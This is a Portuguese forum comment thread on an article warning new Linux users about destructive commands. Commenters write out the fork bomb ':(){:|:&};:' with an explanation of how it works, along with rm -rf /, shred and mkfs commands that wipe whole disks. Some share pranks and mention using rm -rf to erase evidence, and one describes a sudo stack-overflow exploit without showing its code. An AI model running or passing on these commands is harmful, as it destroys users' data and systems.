[58] Comentário enviado por Century_Child em 06/10/2009 - 22:55h
Pra evitar problemas com deleção de arquivos (exceto, é claro, temporários e outros lixos), eu ... não os deleto. Simplesmente jogo eles em uma pasta em outra máquina da rede, espero encher um CD ou DVD (algo que pode levar meses), crio uma lista com os md5sum de cada arquivo, jogo essa lista em ~/Arquivados , etiqueto a mídia e gravo.
Uma mídia não é tão cara assim, e esse procedimento já salvou minha vida quando precisei de arquivos antigos.
O único problema é a pilha de mídias que vai ficando.
E não há 'falha' nenhuma no comando, ele está fazendo o que você mandou. Conhecem a máxima que diz 'faça um sistema a prova de idiotas e a natureza encarregar-se-á de criar idiotas melhores'?
Pois é, não adianta criar um rm/mv/cp 'idiot-proof' se um programa em C pode usar a chamada 'unlink' para isso.
[60] Comentário enviado por Teixeira em 10/10/2009 - 19:36h
Onde existe a intervenção humana, sempre haverá a possibilidade de alguma falha, de maiores ou menores consequências.
Mas para que falhe nao é rigorosamente necessário que tenha o dedo do homem no momento da ação.
Equipamentos sofrem fadiga, falhas eletromecânicas, etc.
Até nosso pensamento falha, e com bastante frequência.
Em determinados momentos nos tornamos "tardigrados mentais", e dizemos para nós mesmos que "deu um branco"...
A NASA perdeu uma sonda especial que deveria ir a Marte, por causa de um simples hífen em um programa (Fortran). Será que o programador era incompetente ou irresponsável, ou ganhava mal e estava desmotivado? Claro que não.
Mas vai ser estigmatizado por esse erro até o final de seus dias na face da terra...
Mas alguém chegou a afirmar que esse foi o hífen mais caro da história da humanidade...
Muitos programas em Cobol já deram pau por causa de um simples ponto (ou de sua falta).
E quantos programas - seja lá em que linguagem foram escritos - já entraram em loop infinito?
Eu mesmo já dei uma mancada dessas, e para piorar as coisas, em Assembly!
É só dar uma piscadinha e - voilà!... - desastre à vista.
No entanto, a possibilidade de acontecerem desastres tanto no Linux quanto no Windows está diminuindo bastante.
Claro que não se tem jamais a certeza ABSOLUTA de que não haverá alguma zebra de plantão por aí, mas o uso do console ou da linha de comandos está cada vez mais restrito a algumas "poucas" pessoas.
Devemos contudo ter cuidado com certos "tutoriais" qua aparecem por aí via internet e cujos conteúdos são verdadeiras "pegadinhas" com a finalidade de enganar os incautos.
[61] Comentário enviado por LinuxGeek em 15/10/2009 - 13:55h
Cara eu acho que tem muita gente reclamando que alguns comandos linux tem falha de segurança, mas devem ser pessoas acostumadas com Ruwindows e com aquelas perguntas bem estilo Microsoft e nem ao menos conseguem entender o que foi pedido pelo comando rm -rf /
Aquele "f" do comando simplesmente quer dizer que vc está falando ao computador "faça o que estou mandando e não me questione!".
Não importa se vc é iniciante ou não, o problema é o jeitinho brasileiro que prefere dizer que sabe tudo e não precisa pesquisar.
Depois não adianta chorar, né?
[62] Comentário enviado por xiloba em 15/10/2009 - 19:43h
Galera, o comando não é uma arma nuclear.
Claro que há utilidade. Em algum momento você pode usá-lo. Por exemplo: você vende ou se desfaz de um hd(daquele micro velinho que você mantém até hoje na esperança de consertá-lo). É interessante que ninguém tenha como vasculhar o hd e ver as tranqueiras que você colocou lá. Telefone, endereço, senha....
Eu prefiro mandar logo um # shred -n5 -vz /dev/hda(ou sda)
Estes são casos em que há um uso correto e bem intencionado. Agora também há os mal-intencionados e os curiosos.
A curiosidade é terrível. No fórum do Slack(http://www.slackbr.org/forum/viewtopic.php?f=17&t=17288) há um colega que colocou na assinatura: echo 1244394795515721490698P | dc
A maioria das pessoas que leem isto, dão o comando. Pode usar não fará mal algum. Juro. É apenas uma piada. E não é de mal gosto.
Além disso, eu, por exemplo, não guardo nada de vital importância no SO. Sempre salvo em pendrive ou cd. Já formatei o pc mais de 2000 vezes. Não faria isto se fosse o pc de uma empresa, por exemplo.
A ciência só avança pelo método da tentativa e erro.
[65] Comentário enviado por gustavo luis em 26/10/2009 - 20:37h
"Com grandes poderes, vem grandes responsabilidades" ->homem aranha???rsrsr
tipo concordo com seu topico +- assim como disseram anteriormente nao é falha nao e sim super usuario, assim como tem como fazer muita merda no linux tbem tem como fazer pior no lixo do windows, ainda abordando um comentario amigo nao é o sistema q faz as merdas mais sim os usuarios, pode ser devido ao uso leigo ou sei la porque, devido a isso q é importante passarmos nossos conhecimentos para a frente nossas informaçoes devem ser livres assim como o linux galera
[67] Comentário enviado por Teixeira em 02/11/2009 - 23:19h
Sudo não deve ser considerado como "falha de segurança". Afinal é um recurso que pode ser inibido pelo administrador.
Notem que na linha seguinte ao sudo o sistema reverte automaticamente para o estado original, acabando com os privilégios obtidos na linha anterior.
Ou seja para cada linha terá de ser digitado sudo (comando).
Ninguém passa a ter poderes PERMANENTES de administrador ou de superusuário pelo simples fato de haver digitado aquele comando. É diferente de logar-se como root.
Acontece que os comandos em Linux são muito poderosos, a ponto de detonar o sistema a mando de um usuário com plenos poderes.
Portanto a falha de segurança recai sobre o usuário (em especial o administrador) e não sobre o sistema.
Se Deus não deu asas à cobra, porque o faríamos nós?
[69] Comentário enviado por Gleudson Junior em 11/11/2009 - 09:59h
Cara,
Muito bom seu artigo! Parabéns.
E endossando suas palavras, muitos desses comandos podem e devem ser protegidos com a não utilização do SU (root). Existe um mandamento básico para usuários iniciantes em Linux que é: "Nunca utilizaras o usuário Deus em vão"!
Conforme diz no Capitulo 3 da Criação do Mundo segundo o Root:
"Então o root começou a pegar os bytes da memória e dos dados do urandom e dele formou o usuário e a este foi concedido o shell. E o usuário passou a viver. E o root lhe disse: "venha a ter em sujeição os diretórios do disco e os bytes da memória. De todos os recursos podeis utilizar, apenas não toqueis no su, pois deveras vos digo que, no dia em que tocares no su, farei um kill -9 em teu shell e apagar-te-ei do passwd." E o usuário passou a viver no jardim do /home e eis que tudo era bonito e perfeito dentro do /home. E o usuário vivia feliz em seu home directory"
[70] Comentário enviado por djoppio em 17/11/2009 - 22:26h
Tah ai, ninguem para comentar sobre o programinha em c....
olha, o programinha em c é realmente um exploit que funciona!, (mas n rodem por favor)
explico.
trata-se de aproveitar uma vulnerabilidade no parametro -p de algumas versões ANTIGAS do sudo (nem vem tentar no seu ubuntu 9.10 q n adianta) onde este tinha um tamanho limitado de caracteres, para mais ele estravasava a pilha,
sintaticamente o que este exploit faz é pegar mais ou menos o endereço de retorno, encher um pouco antes e um pouco depois com NOP (aqueles 0x90), mais um pouco com CALL's para o buffer q estourou onde está armazenado um shellscript.
a grande questão é a seguinte.
LAMERS e NUBIES não devem usar tais ferramentas, elas n são para invasão, são para estudo. para tal o criador do fonte substituiu o shellcode por um shellcode que chama o rm -rf, se corretamente substituido por um shellcode valido e rodado em uma versão válida do sistema teremos um exploit funcionando, mas para isso precisamos primeiro entender seu funcionamento.
[75] Comentário enviado por chacal. em 13/03/2010 - 09:10h
O artigo esta muito bom e os comentários são também são enriquecedor …
Uso linux a quase um ano tenho o cuidado de pega comandos scripts em locais de fonte confiáveis e mesmo assim procuro ler o seu conteúdo a título de entender e de aumenta o meu conhecimento.
Onde existe a intervenção humana mesmo com um SO bem configurado o uso do privilegio sudo/root em qualquer distribuição vai depender do seu operador ter discernimento para executar determinados comando.
[78] Comentário enviado por removido em 27/03/2010 - 23:02h
"Com grandes poderes, vem grandes responsabilidades"
Quando se é novo no Linux ...
Tenha cuidado quando você executar esses comandos ...
Eu já tinha lido este artigo, mas agora me sinto no dever de comentar como você foi feliz em usar as palavras acima para iniciar seu artigo.
Executar comandos sem conhecê-los (script, patch, etc), desconhecendo a idoneidade de quem o escreveu, é como baixar e executar os famosos cracks do M$Windows!
[79] Comentário enviado por GilsonDeElt em 01/04/2010 - 17:30h
Legal seu artigo, cara!
Alguns desses eu conhecia
(lembro que aquele comando que chama um monte de funções eu achei aqui na comu
como "comando pra travar qualquer linux", rsrs, e a explicação é aquela mesmo, de gerar funções até acabar com a memória),
outros não,
e eu não tinha idéia de que tem gente que gasta o tempo criando programas para ferrar usuários de Linux (como aquele em C que basicamente é um rm -rf / )
Mas é isso aí!
Um dos "diferenciais" que vejo nas pessoas que usam Linux porque QUEREM
é que elas procuram (cedo ou tarde) saber o que estão fazendo,
mas esse tipo de alerta seu é necessário (até pra quem tá começando ou já tem um certo tempo de estrada perceber que há certas "ameaças" que não são tão notáveis assim),
para que todos que querem fazer algo no Linux procurem entender o que vão fazer,
e não serem vítimas dessas "armadilhas".
Mais uma vez, parabéns pelo artigo!!
E parabéns pros "comentaristas", pois pelos comentários dá pra aprender bastante tbm
=P
[80] Comentário enviado por marinho01 em 05/04/2010 - 11:22h
Estou pensando em imprimir todos esses comentários, pra ver se consigo assimilar alguma coisa.
Tenho algum tempo de uso, com o Ubuntu, usando várias versões, a partir da 7. alguma coisa.
Porém, esse uso, fica limitado ao uso "externo", como apoio para os programas de edição e queima de cds e dvds e também, para edição de textos e imagens. Não tenho a menor idéia, do que acontece, com esse monte de comandos, pois realmente nunca os usei. Teve um momento, em que precisei reinstalar o ubuntu 9.10 e desde então, não mais consegui me conectar com a internet. Já expliquei várias vezes o que eu uso aqui, meu modem e qual a conta inclusive o provedor, mas, apesar de ter recebido várias dicas, todas elas não se mostraram eficientes, ou talves, pelo fato de eu não saber utilizar as linhas de comando que se digitam junto com o sudo, não mais consegui configurar a net. Precisei voltar para o velho XP, onde tudo funciona certo. Alí não tem linha de comando, ali não precisa de uma sintaxe para funcionar. Claro, ali é um SO proprietário, as pessoas pagam para que ele funcione corretamente, ao passo que O Linux seja de qualquer bistro, é gratuito, portanto, praticamente sem direito a fazer qualquer exigência, contando apenas com a contribuição de milhões de programadores pelo mundo afora. Acredito até que tenhamos tudo para que isso funcione adequadamente, por causa de tantas pessoas que se empenham pra isso, mas, penso que quem trabalha pelo lado externo de um SO, em sua língua natal, sempre terá alguma dificuldade para se enquadrar. Já recebi um monte de e-mails da rapaziada que esta o tempo todo atraz de conhecimentos, e que tentaram me dizer como agir, então, a esses eu posso dizer o que se sabe sobre música." A música é fácil pra quem tem o dom ou impossivel para quem tenta sem isso." Não tive a oportunidade da informática na minha juventude, mesmo porque a palavrar computador, tinha como sinônimo no dicionário assim"homem que computa, homem que calcula" Espero que não fiquem me julgando velho, caduco ou seja lá o que for, sou só um apaixonado pela informática, assim como vemos às vezes por ai, alguém que é marido, mas que mais parece um pai ou avô da gata. Saude a todos.
[87] Comentário enviado por millemiglia em 13/05/2010 - 08:41h
Muito bom seu artigo. É interessante que usuários novatos aprendam a usar o terminal com responsabilidade para não cometer erros comos os descitos no artigo.
[91] Comentário enviado por andremedeiross em 08/06/2010 - 13:19h
hehe
rm -rf / não é um erro do sistema não
se o cara precisar apagar seus indicios de maneira rápida é uma opção
claro q da para recuperar com um software undelete da vida, mas pelo menos da mais trabalho para quem vai ter q recuperar
[95] Comentário enviado por barklome em 24/06/2010 - 22:34h
Muito louco,uma vez fui apagar tudo da minha outra particao,em vez de digitar(estando no/mnt/) rm -Rf eu digitei rm -Rf /* huahhua la se foi meu sistema
[96] Comentário enviado por jahminho em 05/07/2010 - 18:44h
em pensar que chegam usuários novos pedindo ajuda sobre algo que um usuário antigo sabe tem alguns espiritos de porco que simplesmente mandam esses comandos, por pura maldade.
[98] Comentário enviado por alberto.tocant em 09/07/2010 - 21:31h
Achei muito bom o artigo!
Confesso que fiquei assustado quando li o artigo, parece mais um filme de "TERROR". Mas é bom para que usuários iniciantes como eu tenham mais cuidados, possam estar mais cautelosos.
E eu que estou começando a aprender a linguagem C, costumo muitas vezes executar pelo gcc programinhas ai postados pelos usuários de diversos foruns. Puxa fiquei com medo, pois posso estar executando um tipo de vírus mortal que detonaria meu sistema! Puxa!!
[101] Comentário enviado por Aluna em 15/10/2010 - 11:25h
Olha eu achava que o linux barrava demais quando so permitia fazer certas alterações no sistema somente com a conta do root. Até que eu achei uma "receita de bolo" de como instalar fontes e fui executar. Como sou uma mulher precavida, sempre tenho backups de meus arquivos em varios lugares(CD, PEN DRIVES, outras partições etc). Então como sou aluna e aprendiz resolvi executar a "receita maligna". Tive mais uma aula de como existe maldade na internet. Quando reiniciei, o ubuntu avisava que minha pasta home não podia ser encontrada.
Isso me deu um transtorno pois tive que formatar a partição e reinstalar o sistema operacional e atualizar tudo.
Nada é tão desastroso: estou aqui para contar e dizer que há pessoas maliciosas e que não se deve executar um comando sem ter certeza que a pessoa que passou este comando é pessoa da comunidade do bem.
Gosto da inteface grafica pois ela avisa o perigo que estamos fazendo ao mover arquivos. Fiquei mais admirada com segurança do linux que não deixa o usuário comum detonar o sistema, fato que não ocorre com o Windows. No meu caso o dano não foi grande, visto que já ando mexendo e aprendendo e minhas experiencias são para aprendizado mesmo. Imagine esta situação num escritório. Imagine um aluno perdendo todos os seus trabalhos acadêmicos por causa de um "uma receita" dessas?
Adorei o artigo. Parabéns.
[103] Comentário enviado por manguejoe em 24/11/2010 - 01:21h
Duas correções:
"rm -rf /" não funciona mais na maioria das distribuições. Instale uma máquina virtual e teste, vai aparecer a mensagem "Cannot remove root directory" ou seja, não pode remover o diretório raiz.
Porém um rm -rf /* funciona.
"format C:\*.*" não funciona nem no windows. Isso daí parece uma mistura de format com deltree. Seria "deltree /y c:\*.*" Não tem sentido usar coringas com o comando format.
[104] Comentário enviado por removido em 16/12/2010 - 17:00h
No canal ##linux do FreeNode houve uma mais épica
Um gringo que estava num server e deu um MV do /, para dentro de um subdir do / (no caso, /mnt)
Não tinha como voltar. Porque?
O Path ficou zoado, o chroot não funcionava(mesmo passando o absoluto /mnt/sbin/chroot), perdeu referências de link simbólicos, tudo que estava na memória não batia mais com o que precisasse buscar informação em disco e o pior: Se perdesse aquela shell de SSH no cliente, ele nunca mais conectaria(pela lógica das coisas).
Ou seja, alguém dividiu por zero, de tão poderoso que é o Linux XD
[106] Comentário enviado por rfcsilva em 26/12/2010 - 17:09h
Antes de mais nada parabéns pelo artigo, muito instrutivo, além do alerta que nos deixa de que infelizmente ainda existem muita gente má no mundo, obrigado e até breve.
E, quando fizererdes, por palavras ou por obras, fazei tudo em nome do Senhor Jesus, dando por ele graças a Deus Pai.Col.3,17
[112] Comentário enviado por civanlobo em 25/02/2011 - 10:41h
Muito bom o artigo, e como sempre citado o clássico rm -Rf /. Apesar disso ainda há muitos scripts maliciosos contendo tal comando e que é rodado desatentamente.
[113] Comentário enviado por renato_pacheco em 26/02/2011 - 12:33h
Velho, eu fui mau! Tava em uma loja do tipo q vende tudo (não vou mencionar nomes) e tinha uma distro lá baseada em um Mandrake. Usei o fork mencionado aki pra mostrar pra um amigo meu q o linux travava em segundos. Foi engraçado!
[114] Comentário enviado por bitetti em 28/02/2011 - 16:23h
:(){:|:&};:
um amigo meu uma vez mostrou algo parecido que eles usavem nas aulas pra pegar newbies ^^
Eu olhei e perguntei qual dessa função recursiva ^ ^ (na verdade quase experimentei).
Estou em duvida se isso trava um quadcore? Chegando em casa vo testar.
(até agora meu pior travamento foi quando o teclado falhou e n podia + usar login texto.... ai entrei pelo iPod via SSH e dei shutdown ^^)
[118] Comentário enviado por tonyrecife em 02/04/2011 - 22:34h
Grandes companheiros do VOL
Dois comentários
1) O comando rm -rf não irá apagar tudo abaixo da raiz, diretórios como o /sbin e outros não serão apagados por falta de permissão.
2) O código :(){ :|:& };: cria vários processos recursivamente, mas tem solução, é só editar o arquivo /etc/profile, adicionando no final do arquivo o código abaixo:
if [[ "$USER" == "root" ]]; then
ulimit -S -u 512
else
ulimit -S -u 256
fi
limitando o root a 512 processos e os usuários a 256 processos. Essa solução foi publicada aqui mesmo no VOL e em uns trocentos sites americanos.
Ideia legal - Criar alias para comandos um pouco mais "perigosos", colocando o parâmetro i de interative, fazendo o sistema perguntar sobre nossas ações.
[119] Comentário enviado por zuludo em 28/04/2011 - 04:35h
Este é um ótimo artigo, que trouxe discussões melhores ainda. Quero lembrar aos amigos que este artigo é muito válido, com certeza jamais executaria estes comandos. Mas hoje cada vez mais pessoas utilizam linux e precisam destas informações básicas. Eu instalei ára várias pessoas leigas Ubunto desktop com broffice e amsn configurado. Estas pessoas "várias" substituiram o ruindows sem dificuldades e com certeza cairiam em comandos básicos como estes. Desta forma concluo que este artigo não é uma "babaca" e como sabemos Linux é para todos!!!!!!11
[120] Comentário enviado por eduardotreska em 03/05/2011 - 14:57h
Achei esse artigo muito bom, realmente é complicado pensar que tem pessoas de mente pequena que tentam prejudicar os outros com brincadeiras idiotas.
Acredito que as pessoas que se juntam em uma comunidade seja Linux ou qualquer outra comunidade é para se unirem em busca de um objetivo e para trocar experiencias.
[128] Comentário enviado por AprendiNoLinux em 04/08/2011 - 09:21h
Muito bom :)
A dica do rf já tinha visto em livros e várias vezes no forum, mas esta das carinhas é novidade.
Acho que o eval até certo ponto usando script shell é perigoso tanto quanto estes comandos. Sou iniciante em shell script e até o momento nunca usei o eval e nem sei qual é a hora obrigatória de usa-lo. Espero não descobrir rsrs.
[129] Comentário enviado por bruno.magno em 05/08/2011 - 12:26h
Realmente, no curso, quando conheci Linux pela primeira vez, o colega meu execultou o comando rm -rf, o sistema inteiro desligou, todo mundo começou a rir dele e ele fico olhando com cara de bobo, depois que ele entendeu a situação ele falou: Vou tentar de novo... kkkkkk "Os caras não prestam".
Abraço!
[133] Comentário enviado por r4f43lm0r43s em 09/10/2011 - 03:19h
muito bom seu artigo cara,,,
mandei um slackware 12.2 de teste (não configurado) pro espaço em pouco tempo com esses comandos ... : ) ....
é isso que eu gosto no linux,,, liberdade... para explodir seu sistema se assim quiser... mas como root é claro... pelo menos nas confs do meu slack.. se bem que, como mencionado, com umas mudanças aqui.. um sudo ali um usr normal poderia estragar a bagaça.... mas seria por erro humano... bem de qualquer jeito acredito que como o amigo comentou anteriormente um "man NomeDoPrograma" economiza uma baita dor de cabeça.. e evolui seu conhecimento é claro..deveria ter mais tutoriais do genero para que aqueles que estão começando não explodam seu sistemas,,, e para aqueles como eu que ja tem um pouco de conhecimento possam explodir seu sistema com classe e de forma divertida...parabens .... : ).....
[134] Comentário enviado por tiagopuissance em 27/10/2011 - 11:25h
Parabéns pelo artigo! Realmente muito bom! Na minha caminha com linux, no meu caso o Ubuntu descobri um comando não tão destrutivo mas que deu uma dor de cabeça pra consertar:
sudo apt-get remove nautilus
Não execute isso! O sistema fica todo desconfugurado!!
Muito boa a dica!
Deus te abençoe, mais uma vez, PARABÉNS!!
[135] Comentário enviado por coelhoposa em 02/11/2011 - 20:27h
Sou admin do meu PC, a última merda que fiz, foi instalar o e17 completo, e desinstalá-lo. Resultado: O exalt substituiu o Network-Manager, e quando desinstalei, o exalt, foi para o saco... fiquei sem net...
[137] Comentário enviado por gssilva em 19/11/2011 - 19:21h
Muito bom cara!!! Eh uma dica simples, mas fundamental que todos devem saber!!! Parabéns pelo atigo!!! Dei nota 10 a ele porque isso quase que não é lembrado e a imensa maioria dos usuários de computadores somente se lembram disso quando FULL GENERAL!!!
No final da postagem ele fala sobre:
...¨E se o seu Unity for danificado, é possível voltar atras para o padrão de quando eu instalei? SIM! Para este procedimento basta vc remover com o comando rm- rf os diretórios ~/.config , ~/.gconf* , ~/.gnome* E o seu Unity esta lá novinho como se fosse a primeira vez que vc entrou no poderoso Ubuntu (somente em caso de danos e caso vc queira voltar atras)
[140] Comentário enviado por m4iir1c10 em 28/11/2011 - 07:22h
Não ha problemas com esse comando porque ele esta dizendo
apague (rm) a pasta e todo conteudo dela sem me perguntar nada (-rf) a pasta fica dentro da pasta do usuario (~/) e se chamam .config, .gconf e qualquer outra semelhante (*) e .gnome e qualquer outra semelhante (*).
Seria um problemao se voce esquecer a pasta e colocar algo so para testar e acabar com
rm -fr / .config
apague (rm) a pasta e todo conteudo dela sem me perguntar nada (-rf) a pasta e a do sistema ( / ), feito esse comando ignore minha cachaça que vem a seguir (.config e qualquer outra coisa que vier aqui sera ignorado depois do comando ser executado).
Esse problema seria por causa do espaço entre / e .config
[144] Comentário enviado por andrecanhadas em 01/02/2012 - 20:00h
Boa só falta agora os iniciantes lerem tenho visto diariamente uns 5 ou 6 novos usuários com duvidas a alguns dias atras tinha um dizendo que o sistema não iniciava depois que ele segui uma dica de um usuário de um blog. "rm -rf /" (Não façam isso)
[145] Comentário enviado por newoverb10 em 02/02/2012 - 13:45h
Puxa, esse artigo rendeu mesmo!!
Olha, eu sou usuário linux iniciante, aprendendo solo "aos trancos e barrancos" as linhas de comando, comando de navegação via terminal, aquisição de repositórios, etc, etc... Sempre estou atrás de tutoriais que me ajudem. Sou alucinado por mudança de aparência, customização e tudo mais. Já tentei duas distros linux além da que uso atualmente - Ubuntu - pela qual tenho especial afeição, principalmente por ter recebido meu primeiro cd de instalação, pedido pelo site, direto da Holanda. Ainda estou testando! Toda vez que leio sobre as especialidades de uma determinada distro eu fico alucinado pra baixá-la!! Vou montar uma máquina de testes especificamente pra isso!!
Em resumo, adorei o artigo. É útil pra mim visto que ainda estou muito "cru" em Linux. Mas do que mais gostei foi da interação aqui nas respostas. Os debates e opiniões expostas, visando um entendimento melhor... Isso é ótimo!!
Espero poder participar ativamente da comunidade!!!!
[147] Comentário enviado por FreedomLINUX em 16/03/2012 - 23:40h
sou novo no mundo Linux não sei quase nada mais uma coisa que poderia me prejudicar poderia ter sido esses comandos costumo ver tutoriais e usar mais nunca parei pra penssar se as pessoas que estavam postando estão querendo mesmo enciar ou destruir quem tenta aprender...MUITO OBRIGADO PELA DICA AI AMIGO M4iir1c10
[152] Comentário enviado por freesoul em 28/05/2012 - 09:55h
Valeu pelo artigo. Realmente é o que muitos fazem quando estão iniciando no Linux e para um iniciante não é possível identificar se o comando é nocivo ou não. Ainda bem que existem pessoas como você e a maioria dos usuários Vol...Hackers de verdade, é isso que precisamos.
[155] Comentário enviado por N.Bernardes em 12/06/2012 - 08:36h
Eu agora estou com windows 7 mas eu era do ubuntu.Quase todos os dias eu ando lendo um novo tutorial do viva o linux,e eu nunca pensei que eu fosse aprender tanto sobre o linux.Eu agradeço a quem criou este site,eu simplesmente ja estou louca para voltar para o linux,sinceramente o seve não tem graça,acho que depois que vc se acostuma o linux,acha o widows chato,ashausuahsuas muito obrigada.
Eu agradeço o viva o linux..
[156] Comentário enviado por smallboy em 15/06/2012 - 16:03h
Gostei do artigo, bem explicado, só uma conselho mentes perigosas, não façam isso em enviar o código acima que apaga o diretório / não vá fazer essa maldade com aqueles que não leram o artigo, ou mesmo que seja iniciante.
[157] Comentário enviado por oberon em 19/06/2012 - 01:33h
Um amigo aí em cima falou do "bug" pra renomear arquivos no windows. Simplesmente use a tabela ANSI pra renomear um arquivo ou diretório. Funciona até no winxp, acho eu.
Funciona assim: abra o prompt, vá até a pasta do arquivo/pasta a ser nomeado e digite: ren (espaço) nome_do_arquivo.txt (espaço) alt+196nome_do_arquivo.
O arquivo ficará como -nome_do_arquivo, e não poderá ser aberto, gerando um erro a cada tentativa de leitura. Usei o alt+196, mas funciona com qualquer caracter da tabela ANSI.
Não tem muito a ver com o post, mas informação nunca é demais =)
[159] Comentário enviado por removido em 04/07/2012 - 22:12h
Muito bom, gostei... Mas, se são do mal, por que esses comandos existem, ou por que não há tipo uma proteção que impeça de execução de comandos perigosos assim?
[166] Comentário enviado por jvlopes91 em 17/10/2012 - 23:34h
Ótimo alerta, me ajudou muito que sou iniciante
Acho que Linux assim como Windows ou computadores em gerais são uma faca de dois gumes
Você pode fazer coisa maravilhosa e produtiva ou não
[168] Comentário enviado por Silas_rugby08 em 09/11/2012 - 10:14h
Bacana a matéria!!
Sou iniciante no Linux e desconhecia o poder de tais comandos, já imaginava que devia ter um que "ferrava" com tudo, mas ainda não tinha conhecimento sobre eles.
A partir de agora tomarei mais cuidado!!
=)
[170] Comentário enviado por Cr4sh_Dump em 30/11/2012 - 07:49h
Muito bom mostrar esses comandos principalmente gostei de mostrar o algoritmo em C da shellcode por isso sempre digo para o pessoal que esta estudando shellcode que é melhor voce mesmo aprender a construir suas shells de zero desde o mais simples como um comando exit ou write do que executar shells prontas que não se sabe o que elas fazem verdadeiramente de antemão e em caso de executadas por serem complexas recomendo sempre testar em uma maquina virtual que é um ambiente controlado que não oferece risco a seu sistema propriamente dito. muito bom o artigo parabens!
[171] Comentário enviado por Lerub em 01/12/2012 - 05:18h
Boa! Mas até quem mexe ainda com o sistema operacional windows, poderá passar por uma situação bem desconfortável. Isso se resulta ao fato das pessoas com pouco conhecimento acreditarem em qualqur cooisa que lhes dizem. Eu mesmo já passei por apertos. Mas agora sei como funciona as duas arquiteturas mais usadas no mundo todo.
[177] Comentário enviado por lordestark em 30/05/2013 - 20:26h
mkfs.ext3 /dev/sda
esse comando é otimo para formatar TODO,EU DISSE TODO O DISCO RIGIDO DO PC.
como foi meu caso.
formatei todo o meu pc, por que meu windows e meu linux mint,tavam doido.
não tavam bem.
no Linux mint, o meu linux abria a pasta home do nada,depois que fazia login,pastas abriam do nada,como a do Downloads,Imagens,e tal....
no Windows,tava com vírus.
o famoso EXPLORER.EXE(vírus do windows)
por isso eu executei esse comando.
________________
mkfs.ext3 /dev/sda
________________
ATENÇÃO,SÓ EXECUTEM ESSE COMANDO,SE QUISEREM FORMATAR O HD TODO,TIRAR TODOS OS SISTEMAS!!!
mas não garanto que o teu pc vai voltar a funcionar legal.só vai funcionar depois de uma bela formatação
esse comando tirou todos os sistemas operacionais do meu pc.bem,pelo menos no meu foi!
primeiro testem na maquina virtual!
[178] Comentário enviado por 4tentativa em 11/07/2013 - 10:42h
Para novatos, artigos assim são muito importantes. vemos artigos falando sobre 'como fazer' mas são poucos dizendo 'o que não fazer'.
Muito agradecida pelo alerta. Aprendi que o melhor caminho para os novatos são os fóruns. Ao menos, se alguém falar uma bobagem, será consertado pelos demais.
[181] Comentário enviado por vigia122 em 29/07/2013 - 11:06h
Já estraguei uma instalação do Ubuntu com o LAMP-SERVER!
Na instalação ocorreu tudo bem, sendo fácil roda um sudo apt-get install lamp-server^
Mas quando eu fui desinstalar com um sudo apt-get remove lamp-server^ ele simplesmente desinstalou TODOS os pacotes do meu Ubuntu. Depois fui ver na Internet que este comando fazia isto mesmo. Então nunca rode um sudo apt-get remove lamp-server^ (acho que nunca se pode usar um comando de desinstalação com ^ no final)!
[182] Comentário enviado por willianlima em 05/09/2013 - 22:24h
Artigo muito interessante, principalmente para quem não tem muita afinidade com o modo texto. A reflexão é muito válida: Entenda o comando que vocẽ vai executar, não execute só porque vocẽ leu em um tutorial qualquer. Pode ser uma armadinha.
[183] Comentário enviado por leojaco25 em 17/09/2013 - 11:59h
Existe um outro comando, que estava sendo executado num script de backup de um cliente de uma empresa que eu trabalhava (não, não fui eu quem criou o script). Ele basicamente movia todos os arquivos do diretório "$tmpdir" para o "/dev/null". O problema é que o "$tmpdir" não havia sido setado corretamente, e estava como "tmpdir=/ u/tmp". Resultado? Tudo no servidor foi movido durante o backup para o "buraco-negro". Só descobriram depois de reinstalar o "SCO" (sim, isso foi há muitos, muitos anos atrás), instalarem todo o sistema, trabalharem arduamente durante o dia, e à noite, por volta da 1:00hr rodarem o backup. Bom, quem criou o script de backup me ensinou uma coisa: "Sempre sete todas as variáveis necessárias no início do script, nunca deixe para depois".
[189] Comentário enviado por JFurio em 11/04/2014 - 17:10h
Realmente, sou iniciante no Linux (CentOS e Ubuntu), mas sou antigo com Windows em geral, e tanto como no windows, imaginei que existiria comandos do mal, igual ao windows, a única diferença é que a microsoft tirou muito coisa com o passar das versões dos windows, mas eu sei que os windows mais antigos era possível realizar muita maldade com usuários iniciantes! Parabéns pelo artigo e com certeza me deixou muito mais atento com os comandos que eu procuro pela internet! Obrigado!
[190] Comentário enviado por vitinho217 em 02/07/2014 - 20:32h
Realemnte com grandes poderes vem grandes responsabilidades !
Somos responsáveis por nosssos atos até aqui no LINUX, isto vale para tanto menores quanto maiores kkkkk
[191] Comentário enviado por starkiller em 17/07/2014 - 18:22h
Muito legal a dica. Hoje eu precisei de desinstalar a pasta oculta do wine (.wine) então dentro de home/meunome/ eu fiz rm -rf .wine. Bom o problema foi resolvido, pois havia um programa do wine que eu queria desinstalar, mas não conseguia. Rsrsrsrsrr, ainda bem que me lembrei do wine depois do ponto.
[196] Comentário enviado por Eaden em 20/05/2015 - 22:01h
Eu pensei em uma coisa interessante. O linux ''padronizar'' esses comandos e emitir uma mensagem de perigo caso sejam executados, por exemplo:
# rm -Rf /
aí retornava:
* Perigo! O comando irá remover todos os arquivos de "/". Deseja cotinuar? S/ N
[197] Comentário enviado por cleisonss em 06/09/2016 - 21:29h
[3] Comentário enviado por thiagods.ti em 07/07/2009 - 15:21h
:(){:|:&};:
Vou explicar esse comando =)
:() isso aqui cria uma função
{} pode se notar 2 chaves uma no começo e outra no final do comando, são as chaves de abertura da função.
:|:& o que isso faz, na realidade chama a função :() (que você acabou de criar) e pega a saida dela e manda para outra função :() porém em segundo plano.
O ; no final finaliza a função e a linha e os : final chama a função para ser executada.
Senão me engano é isso.
Ai abre tantas funções dessa que sua memória é consumida em pouco tempo pois cada função que for chamada emite o comando de chamada de função para outra função e vai para segundo plano e assim sucessivamente.
[199] Comentário enviado por tampinha em 11/12/2019 - 08:35h
Muito bom, também é legal lembrar aqueles comandos que a gente já fez por diversão, tipo o famoso mkfs.vfat type=32 /dev/sda
Mas isso também pode ser usado para scripts de remoção de um linux que o usuário não utiliza mais, etc.
[200] Comentário enviado por nico_gamer_4d em 06/11/2020 - 12:03h
Já se passaram mais de 11 anos desde a publicação desse artigo. Mas ainda assim. Ele está ajudando muitos usuários e assim, sucessivamente! Muito obrigado por compartilhar essas informações PERIGOSÍSSIMAS!
Fiquei mais horrorizado foi com o comando "rm -rf / &" pois ele, não só apaga os seus arquivos pessoais e sim, A RAIZ DO SEU SISTEMA INTEIRO. Tudo aquilo que faz o seu PC ligar, desligar e demais funções. TUDO FOI JOGADO POR ÁGUA ABAIXO. Mesmo existindo pessoas de má fé. Sempre irá existir pessoas como VOCÊ. Ajudando ao próximo, a evitar desinformação! :D